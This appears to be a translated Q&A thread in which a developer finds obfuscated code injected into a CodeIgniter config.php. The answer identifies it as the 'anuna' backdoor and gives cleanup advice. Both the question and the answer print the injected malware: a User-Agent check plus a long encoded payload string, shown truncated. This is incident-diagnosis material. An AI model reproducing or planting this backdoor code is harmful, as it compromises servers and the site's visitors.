源代码-PHP中的奇怪和不寻常的字符

时间:2016-04-07 11:02:43

标签: php

几个月前,我用 CodeIgniter 创建了一个站点并将其上传到线上服务器。它一直运行正常,直到站点所有者让我更新该站点上的一些文件。我把站点备份下来并在本地计算机上搭建,这时注意到许多文件的源代码里多出了大量奇怪的字符,例如 config.php 文件:

      <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $nqzonxuuvd = '85csboe))1%x5c%x782f35.)x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QU-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y325fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]27;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%%x782f!**#sfmcnbs+yfeobz+sfwjidsb%1]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y3e]81#%x5c%x782f#7e7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x7("%x2f%50%x2e%52%x29%57%x6%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x225c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%xx787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5crr)%x5c%x7825r%x5c%x7x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985tjyf%x5c%x7860%x5c%x7878%x~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osgj6<*doj%x5c%x78257-C)fepmqnjA%x5o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x78#Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7824-tusqpt)%x5c%x7825z-#:#*74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x782c%x7827!hmg%x5c%x7825)!gj!<2,*j%xx7824<%x5c%x7825j,,*!|%xc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x7825bss-%x5c%x7825r%x5c8256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*Q]y33]65]y31]55]y85]82]x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8]18y]#>q%x5c%x7825<#762]
67y]562]38y]572]48y]#>m%x5c%x7*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutx5c%x7825)}.;%x5c%x7860UQPMSVD!-*b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c5c%x7825:>:r%x5c%x7825:|:**t%xjyf%x5c%x78604%x5c%x78g39*56A:>:8:|:7#6#)tutjyfx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)s#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)4%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*1x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74],#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%xW%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825c%x7825-

最初,我的config.php文件看起来像这样

    <?php
      // Direct-access guard: the script exits unless BASEPATH is already defined.
      // Per the asker, the clean config.php began with this line, so it serves as the
      // baseline when comparing against the modified copy pulled from the server.
      defined('BASEPATH') OR exit('No direct script access allowed');

除了一些错误通知(PHP 的弃用通知)之外,这个网站仍能正常运行;这些通知是因为网站使用旧版本的 PHP 而出现的,可以通过调整 php.ini 文件来关闭。

知道发生了什么事吗?

1 个答案:

答案 0 :(得分:0)

以下是代码的可读版本:

<?php 
    // Decoded form of the first injected statement. In the infected file the two string
    // keys are written as mixed hex/octal escapes, so a plain-text search for the decoded
    // names will not match the on-disk form.
    // Runs only while $GLOBALS["anuna"] is still unset.
    if(!isset($GLOBALS["anuna"])) { 
        // Lower-cased User-Agent of the current request; read without an isset() check,
        // so a request that sends no User-Agent header raises a PHP notice here.
        $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); 
        // Flag is set only when the User-Agent contains neither "msie" nor "rv:11"
        // (presumably an Internet Explorer check; "rv:11" appears in IE 11 User-Agents).
        // NOTE(review): how the flag is consumed is not visible; the encoded payload
        // that follows is truncated on this page.
        if ((! strstr($ua,"msie")) and (! strstr($ua,"rv:11"))) 
            $GLOBALS["anuna"] = 1; 
    }
?>
<?php 
    $nqzonxuuvd = '85csboe))1%x5c%x782f35.)x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QU-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y325fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]27;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%%x782f!**#sfmcnbs+yfeobz+sfwjidsb%1]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y3e]81#%x5c%x782f#7e7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x7("%x2f%50%x2e%52%x29%57%x6%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x225c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%xx787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5crr)%x5c%x7825r%x5c%x7x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985tjyf%x5c%x7860%x5c%x7878%x~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osgj6<*doj%x5c%x78257-C)fepmqnjA%x5o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x78#Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7824-tusqpt)%x5c%x7825z-#:#*74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x782c%x7827!hmg%x5c%x7825)!gj!<2,*j%xx7824<%x5c%x7825j,,*!|%xc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x7825bss-%x5c%x7825r%x5c8256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*Q]y33]65]y31]55]y85]82]x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutx5c%x7825)}.;%x5c%x7860UQPMSVD!-*b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c5c%x7825:>:r%x5c%x7825:|:**t%xjyf%x5c%x78604%x5c%x78g39*56A:>:8:|:7#6#)tutjyfx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#
)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)s#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)4%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*1x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74],#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%xW%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825c%x7825-

此代码第二行中提到的 anuna 是一个木马后门。您可以在原回答给出的链接中阅读其技术详细信息(该链接在本页中已丢失)。注意:上面的可读版本只还原了开头的变量名和 User-Agent 检查,后面的长字符串仍是编码后的载荷,并未解码。

简而言之......

您被黑了。您应该更改密码,查看服务器日志并上传网站的新副本。新副本应来自已知干净的来源(例如版本库或感染之前的备份),而不是刚从被感染的服务器上下载的备份;同时应根据日志找出入侵入口并修补,否则重新上传后站点很可能再次被感染。